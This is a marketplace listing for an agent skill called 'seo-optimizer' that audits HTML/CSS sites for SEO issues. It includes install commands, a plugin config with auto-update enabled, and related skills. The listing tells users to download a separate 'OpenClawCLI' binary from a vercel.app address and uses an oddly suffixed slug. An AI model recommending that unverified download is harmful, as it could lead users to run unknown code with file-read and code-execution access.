seo-optimizer
This skill should be used when analyzing HTML/CSS websites for SEO optimization, fixing SEO issues, generating SEO reports, or implementing SEO best practices. Use when the user requests SEO audits, optimization, meta tag improvements, schema markup implementation, sitemap generation, or general search engine optimization tasks.
Why use this skill?
Analyze your HTML websites for SEO issues, generate audit reports, and implement best practices for meta tags, schema, and page structure with the SEO Optimizer skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/thiagoruss0/seo-optimizeruuWhat This Skill Does
The seo-optimizer skill is a robust, automated toolkit designed to audit, evaluate, and enhance the search engine optimization (SEO) of HTML and CSS-based websites. By leveraging the OpenClawCLI, this skill performs deep scans of your codebase to identify common pitfalls that hinder search engine rankings. It automatically generates actionable reports that detail issues ranging from structural HTML errors, such as missing H1 tags or improper hierarchy, to metadata deficiencies like absent meta descriptions or invalid canonical links. Beyond analysis, it provides a structured workflow for developers to systematically address technical SEO debt, ensuring that websites adhere to current web standards and search engine best practices.
Installation
To use this skill, ensure that the OpenClawCLI is installed on your system. You can download the CLI for Windows or MacOS at https://openclawcli.vercel.app/. Once installed, you can add this skill to your workspace by executing the following command in your terminal:
clawhub install openclaw/skills/skills/thiagoruss0/seo-optimizeruu
Use Cases
This skill is intended for web developers, digital marketers, and SEO specialists who need to perform automated audits on static or server-rendered HTML sites. It is ideal for:
- Pre-deployment technical SEO audits to ensure sites are crawlable and indexable.
- Fixing legacy codebase SEO issues by identifying missing metadata or image alt tags.
- Generating automated reports for clients or team members regarding site performance.
- Validating schema markup to enable rich snippets in Google search results.
- Ensuring mobile-friendly compliance by validating viewport settings.
Example Prompts
- "Analyze my entire public directory and create a summary report of all critical SEO issues that need immediate fixing."
- "I need to improve my site's search engine presence. Can you generate an SEO audit for index.html and provide code snippets to fix the identified warnings?"
- "Check if my current website has valid schema markup and suggest improvements for my meta descriptions to boost click-through rates."
Tips & Limitations
- Hierarchy matters: Always prioritize fixing critical issues (🔴) before moving on to warnings (⚠️). Missing H1s or canonical tags are high-impact fixes.
- JSON for automation: If you are building a custom pipeline, use the
--jsonflag with the script to pipe findings into other data analysis tools. - Limitations: This tool is optimized for HTML/CSS structures. It does not perform real-time tracking of search engine rankings, nor does it analyze backend database performance or dynamic content generated through heavy JavaScript frameworks unless rendered as static HTML.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-thiagoruss0-seo-optimizeruu": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-read, code-execution
Related Skills
n8n
Manage n8n workflows and automations via API. Use when working with n8n workflows, executions, or automation tasks - listing workflows, activating/deactivating, checking execution status, manually triggering workflows, or debugging automation issues.
Read WeChat local data from SQLite databases. Supports listing contacts, chat sessions, searching messages, and viewing favorites. Use when the user needs to access their own WeChat data stored locally. Requires access to WeChat data directory. Read-only operations only.
coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
veo3-gen
Generate and stitch short videos via Google Veo 3.x using the Gemini API (google-genai). Use when you need to create video clips from prompts (ads, UGC-style clips, product demos) and want a reproducible CLI workflow (generate, poll, download MP4, optionally stitch multiple segments).
jira
Jira API integration with managed OAuth. Search issues with JQL, create and update issues, manage projects and transitions. Use this skill when users want to interact with Jira issues, projects, or workflows. For other third party apps, use the api-gateway skill (https://clawhub.ai/byungkyu/api-gateway).